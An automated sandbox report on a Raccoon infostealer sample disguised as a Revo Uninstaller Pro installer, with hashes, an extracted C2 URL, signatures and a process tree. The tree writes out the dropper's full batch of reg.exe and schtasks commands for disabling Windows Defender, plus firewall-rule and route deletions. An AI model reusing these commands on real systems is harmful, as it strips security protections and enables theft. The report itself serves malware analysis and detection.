Analysis

  • max time kernel
    156s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    19-04-2022 02:20

General

  • Target

    a3de2c0a2b07bec06bbc0234f52b1f0eca2a8e2b2894c8aa799272d96ac93ca0.exe

  • Size

    21.3MB

  • MD5

    a2c4b05a18fae87bf93ee0952e4dd87e

  • SHA1

    a797967d964d4af37624a8f4140338cee59f0b04

  • SHA256

    a3de2c0a2b07bec06bbc0234f52b1f0eca2a8e2b2894c8aa799272d96ac93ca0

  • SHA512

    66743faa10b11e4964592b9bd1cd065f92da649caec5ad9b895a9227db55bb6ba7dcebe2f01359d46816a2542fa4bf58aa24c6fa75648c9b6e05d9a765b0c119

Malware Config

Extracted

Family

raccoon

Version

1.7.1-hotfix

Botnet

0422feff6c251ddfdca83125d9b8ae570db3b316

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 6 IoCs
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Executes dropped EXE 8 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 17 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a3de2c0a2b07bec06bbc0234f52b1f0eca2a8e2b2894c8aa799272d96ac93ca0.exe
    "C:\Users\Admin\AppData\Local\Temp\a3de2c0a2b07bec06bbc0234f52b1f0eca2a8e2b2894c8aa799272d96ac93ca0.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Users\Admin\AppData\Local\Temp\is-VII6K.tmp\a3de2c0a2b07bec06bbc0234f52b1f0eca2a8e2b2894c8aa799272d96ac93ca0.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-VII6K.tmp\a3de2c0a2b07bec06bbc0234f52b1f0eca2a8e2b2894c8aa799272d96ac93ca0.tmp" /SL5="$60124,21638270,788992,C:\Users\Admin\AppData\Local\Temp\a3de2c0a2b07bec06bbc0234f52b1f0eca2a8e2b2894c8aa799272d96ac93ca0.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\52JIE\MMF.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1752
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\52JIE\DisableOAVProtection.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:520
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            5⤵
              PID:1708
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              5⤵
                PID:1192
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                5⤵
                  PID:1704
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  5⤵
                    PID:1552
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    5⤵
                      PID:864
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      5⤵
                        PID:2040
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        5⤵
                          PID:2036
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          5⤵
                            PID:1548
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            5⤵
                              PID:1316
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                              5⤵
                                PID:1952
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                5⤵
                                  PID:2032
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                  5⤵
                                    PID:1916
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                    5⤵
                                      PID:1328
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      5⤵
                                        PID:2008
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        5⤵
                                          PID:604
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                          5⤵
                                            PID:1336
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                            5⤵
                                              PID:1620
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              5⤵
                                                PID:876
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                5⤵
                                                  PID:1420
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  5⤵
                                                    PID:1832
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                    5⤵
                                                      PID:1840
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                      5⤵
                                                        PID:648
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                        5⤵
                                                          PID:936
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                          5⤵
                                                            PID:584
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                            5⤵
                                                              PID:1536
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                              5⤵
                                                                PID:1648
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                5⤵
                                                                  PID:1824
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                  5⤵
                                                                    PID:988
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                    5⤵
                                                                      PID:1716
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                      5⤵
                                                                        PID:1804
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                        • Modifies security service
                                                                        PID:884
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                          PID:1608
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c ""C:\ProgramData\52JIE\main.bat" "
                                                                        4⤵
                                                                        • Loads dropped DLL
                                                                        PID:1576
                                                                        • C:\Windows\SysWOW64\mode.com
                                                                          mode 65,10
                                                                          5⤵
                                                                            PID:1072
                                                                          • C:\ProgramData\52JIE\7z.exe
                                                                            7z.exe e file.zip -p___________24167pwd79pwd22684___________ -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1456
                                                                          • C:\ProgramData\52JIE\7z.exe
                                                                            7z.exe e extracted/file_3.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1740
                                                                          • C:\ProgramData\52JIE\7z.exe
                                                                            7z.exe e extracted/file_2.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1120
                                                                          • C:\ProgramData\52JIE\7z.exe
                                                                            7z.exe e extracted/file_1.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:532
                                                                          • C:\ProgramData\52JIE\nmhost.exe
                                                                            "nmhost.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2036
                                                                            • C:\ProgramData\52JIE\nmhost.exe
                                                                              "nmhost.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:1652
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c ""C:\ProgramData\52JIE\DiskRemoval.bat" "
                                                                          4⤵
                                                                            PID:1748
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /T 60 /NOBREAK
                                                                              5⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:1552
                                                                        • C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
                                                                          "C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:1780
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh.exe advfirewall firewall delete rule name="all" remoteip=95.141.193.133
                                                                            4⤵
                                                                              PID:580
                                                                            • C:\Windows\SysWOW64\route.exe
                                                                              route.exe delete 95.141.193.133
                                                                              4⤵
                                                                                PID:1916

                                                                        Network

                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                        Persistence

                                                                        Modify Existing Service

                                                                        3
                                                                        T1031

                                                                        Defense Evasion

                                                                        Modify Registry

                                                                        2
                                                                        T1112

                                                                        Disabling Security Tools

                                                                        1
                                                                        T1089

                                                                        Discovery

                                                                        System Information Discovery

                                                                        1
                                                                        T1082

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
                                                                          Filesize

                                                                          17.0MB

                                                                          MD5

                                                                          70466ba93881ff376a0c24e28c3c75f6

                                                                          SHA1

                                                                          dcaaf2707c640f5099b06dc4bdc677f83254273b

                                                                          SHA256

                                                                          7ad8e120cf522dbeda0aad6e797b148e75a9c18ad045e23f79d16f31c1b47e39

                                                                          SHA512

                                                                          5f17d5375669193e53c4239aa5818a98ce40005dde5b99ad94de9d3d1d8abe34c0b7a85989699f713ba7cd9b476e8fd53b0f2efa25c38e6c9cfdc4765ec3f40a

                                                                        • C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
                                                                          Filesize

                                                                          17.0MB

                                                                          MD5

                                                                          70466ba93881ff376a0c24e28c3c75f6

                                                                          SHA1

                                                                          dcaaf2707c640f5099b06dc4bdc677f83254273b

                                                                          SHA256

                                                                          7ad8e120cf522dbeda0aad6e797b148e75a9c18ad045e23f79d16f31c1b47e39

                                                                          SHA512

                                                                          5f17d5375669193e53c4239aa5818a98ce40005dde5b99ad94de9d3d1d8abe34c0b7a85989699f713ba7cd9b476e8fd53b0f2efa25c38e6c9cfdc4765ec3f40a

                                                                        • C:\ProgramData\52JIE\7z.dll
                                                                          Filesize

                                                                          1.6MB

                                                                          MD5

                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                          SHA1

                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                          SHA256

                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                          SHA512

                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                        • C:\ProgramData\52JIE\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • C:\ProgramData\52JIE\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • C:\ProgramData\52JIE\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • C:\ProgramData\52JIE\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • C:\ProgramData\52JIE\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • C:\ProgramData\52JIE\DisableOAVProtection.bat
                                                                          Filesize

                                                                          33KB

                                                                          MD5

                                                                          c97c64f53865b9da2a642d36b02df043

                                                                          SHA1

                                                                          181ca1deb68409feae2e70ebf347b3111218a47a

                                                                          SHA256

                                                                          1e37317e8e44fcf8ee132870eb137021e8828be99dcc69d1167f1bce9fb24e17

                                                                          SHA512

                                                                          05ef252545d9315a100ba2e109499c0596fd8a0d02679e42d0e3a2f3047518ded7cf342ce9c414b48387ff102d516c3fbc7b4dcbf1bb445e2a23ed9c6092ec2c

                                                                        • C:\ProgramData\52JIE\DiskRemoval.bat
                                                                          Filesize

                                                                          211B

                                                                          MD5

                                                                          0f00552cee3a31dc4e8adc2738ca6d76

                                                                          SHA1

                                                                          85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                          SHA256

                                                                          1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                          SHA512

                                                                          137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                        • C:\ProgramData\52JIE\MMF.vbs
                                                                          Filesize

                                                                          20KB

                                                                          MD5

                                                                          fa6dcfa398aff28ba12687272732eb51

                                                                          SHA1

                                                                          f207b64cfd0270d6f2222e2fac98ef9c262dd313

                                                                          SHA256

                                                                          f2df2c8ac96c7c2e54afe992b302d823dc62d5754b6882b5ffdf19c293fc298d

                                                                          SHA512

                                                                          9064b3a25b2c1dcfd2d91ec28fe4e61843739d3fc6a630bf46055b8e6198b546398e06e81c62a7ae47c8316f162145b81d228d3bcbc5a9ee44b458aba6f59dfd

                                                                        • C:\ProgramData\52JIE\extracted\ANTIAV~1.DAT
                                                                          Filesize

                                                                          2.0MB

                                                                          MD5

                                                                          e177d8a197054920edc50c867c4d83c7

                                                                          SHA1

                                                                          93a9a13cb0e431d5d16c8d4656a71fe799e293b6

                                                                          SHA256

                                                                          91660c99fa87b69b7580ce7ce912120972e035f6ec058d9c1459f4f57098dfaf

                                                                          SHA512

                                                                          a39d0ee3e5f54366992dad2287bb2987b3d5aa4cb9b89354f43b36dcd57d466391e9927893803456a2b9fa19841eb0162dd2b4d97adba03ffe2005f1d51bd3a0

                                                                        • C:\ProgramData\52JIE\extracted\file_1.zip
                                                                          Filesize

                                                                          711KB

                                                                          MD5

                                                                          68c03d9f4ec112a706451e52ab0d0b6f

                                                                          SHA1

                                                                          70e4273937d277b2eb31cc355dafb614e7d92f0f

                                                                          SHA256

                                                                          2187fcb6ee171a80c7095fc4ce893ca4f543821a5dfed8e3ee4c16b5846cf5c2

                                                                          SHA512

                                                                          450255afb9105294a952bf53cb2ac6fdacfd000d10596b64e464566c3bdd23af127767ab4117b67195f4e6eed3e7b7470cd5254a2bc8e2c20f2a68dcfaf3cde0

                                                                        • C:\ProgramData\52JIE\extracted\file_2.zip
                                                                          Filesize

                                                                          711KB

                                                                          MD5

                                                                          465948131d48f0baa17e0bf956d05809

                                                                          SHA1

                                                                          76c9154637e706f48201c1f2714541d992c5566e

                                                                          SHA256

                                                                          79454b0e77c513282954fe6aaf30f1a7091ecb82044c5fc6c499fd8bc60fb1ce

                                                                          SHA512

                                                                          dc42c9261855682cdfbb5a6bf07d689f6485564fa31b66cdf4930ea10e4b06a92cb6b7d06989b57766a9032e2e5a3a685cf41b9b30faeb4947f4b676b26ff1c9

                                                                        • C:\ProgramData\52JIE\extracted\file_3.zip
                                                                          Filesize

                                                                          2.2MB

                                                                          MD5

                                                                          fd0491fdaf5981fb3a2838a05d0eebcf

                                                                          SHA1

                                                                          327109c15b1edfa7b414becefed917d5da249365

                                                                          SHA256

                                                                          a9b1c8af8081cd01593c16558871f9e9c6ee7b5ee7642a83091ffec7bc605fc8

                                                                          SHA512

                                                                          415cff0b902334733d392809f1b7d45df237eee94d962764a07ddd551af4847ee8fde3fa37aeccca37dcfee6afc786643fc167915bc3d505ae335b098106a639

                                                                        • C:\ProgramData\52JIE\extracted\nmhost.exe
                                                                          Filesize

                                                                          1.2MB

                                                                          MD5

                                                                          afb2c0a5886354403bcdabb3c3f04e67

                                                                          SHA1

                                                                          8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                          SHA256

                                                                          b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                          SHA512

                                                                          6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                        • C:\ProgramData\52JIE\file.bin
                                                                          Filesize

                                                                          2.2MB

                                                                          MD5

                                                                          790b451c8430b0c527f9ede30cce5f29

                                                                          SHA1

                                                                          5de6843d48641c14023c7f07f631f2a364697ae3

                                                                          SHA256

                                                                          777753312bb53895bb19c12c968ad5948fd4adcc534dee97d32b570fd6b827a7

                                                                          SHA512

                                                                          168ab36305b68e145ff7623ea611dba3ac3e1d6354ae9b3b8f621a179d75c07bda2237057320b440bf6a553dc48ee3a23fb4cad44dc52dc0cb62b455d2a0aafd

                                                                        • C:\ProgramData\52JIE\main.bat
                                                                          Filesize

                                                                          397B

                                                                          MD5

                                                                          7bcce13698737af294fffe1859c19b80

                                                                          SHA1

                                                                          33cd5b5e0c5dc1f515f93928fa6a0b0e81f591cc

                                                                          SHA256

                                                                          d5fa298b9210682b6d0d181ba1db301aa3f7eec2c69d5728cdd5c979d905e16c

                                                                          SHA512

                                                                          c491517707fa34593c4e0b66228eab2866d2c36f59377b2f2328e3dd88653e5cd64bdd6d07bf8fc8481fee02f34cd01c1d836aebacf6ffb89ea67f3ff4aa8d18

                                                                        • C:\ProgramData\52JIE\nmhost.exe
                                                                          Filesize

                                                                          1.2MB

                                                                          MD5

                                                                          afb2c0a5886354403bcdabb3c3f04e67

                                                                          SHA1

                                                                          8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                          SHA256

                                                                          b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                          SHA512

                                                                          6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                        • C:\ProgramData\52JIE\nmhost.exe
                                                                          Filesize

                                                                          1.2MB

                                                                          MD5

                                                                          afb2c0a5886354403bcdabb3c3f04e67

                                                                          SHA1

                                                                          8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                          SHA256

                                                                          b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                          SHA512

                                                                          6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-VII6K.tmp\a3de2c0a2b07bec06bbc0234f52b1f0eca2a8e2b2894c8aa799272d96ac93ca0.tmp
                                                                          Filesize

                                                                          2.5MB

                                                                          MD5

                                                                          d0e24e6d7017127bea02bb0160229bee

                                                                          SHA1

                                                                          34350e5b7f268797b2a7ec56390c2228f841b37b

                                                                          SHA256

                                                                          ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994

                                                                          SHA512

                                                                          f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86

                                                                        • \Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
                                                                          Filesize

                                                                          17.0MB

                                                                          MD5

                                                                          70466ba93881ff376a0c24e28c3c75f6

                                                                          SHA1

                                                                          dcaaf2707c640f5099b06dc4bdc677f83254273b

                                                                          SHA256

                                                                          7ad8e120cf522dbeda0aad6e797b148e75a9c18ad045e23f79d16f31c1b47e39

                                                                          SHA512

                                                                          5f17d5375669193e53c4239aa5818a98ce40005dde5b99ad94de9d3d1d8abe34c0b7a85989699f713ba7cd9b476e8fd53b0f2efa25c38e6c9cfdc4765ec3f40a

                                                                        • \ProgramData\52JIE\7z.dll
                                                                          Filesize

                                                                          1.6MB

                                                                          MD5

                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                          SHA1

                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                          SHA256

                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                          SHA512

                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                        • \ProgramData\52JIE\7z.dll
                                                                          Filesize

                                                                          1.6MB

                                                                          MD5

                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                          SHA1

                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                          SHA256

                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                          SHA512

                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                        • \ProgramData\52JIE\7z.dll
                                                                          Filesize

                                                                          1.6MB

                                                                          MD5

                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                          SHA1

                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                          SHA256

                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                          SHA512

                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                        • \ProgramData\52JIE\7z.dll
                                                                          Filesize

                                                                          1.6MB

                                                                          MD5

                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                          SHA1

                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                          SHA256

                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                          SHA512

                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                        • \ProgramData\52JIE\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • \ProgramData\52JIE\nmhost.exe
                                                                          Filesize

                                                                          1.2MB

                                                                          MD5

                                                                          afb2c0a5886354403bcdabb3c3f04e67

                                                                          SHA1

                                                                          8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                          SHA256

                                                                          b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                          SHA512

                                                                          6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                        • \ProgramData\52JIE\nmhost.exe
                                                                          Filesize

                                                                          1.2MB

                                                                          MD5

                                                                          afb2c0a5886354403bcdabb3c3f04e67

                                                                          SHA1

                                                                          8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                          SHA256

                                                                          b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                          SHA512

                                                                          6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                        • \Users\Admin\AppData\Local\Temp\is-N0D0M.tmp\_isetup\_iscrypt.dll
                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          a69559718ab506675e907fe49deb71e9

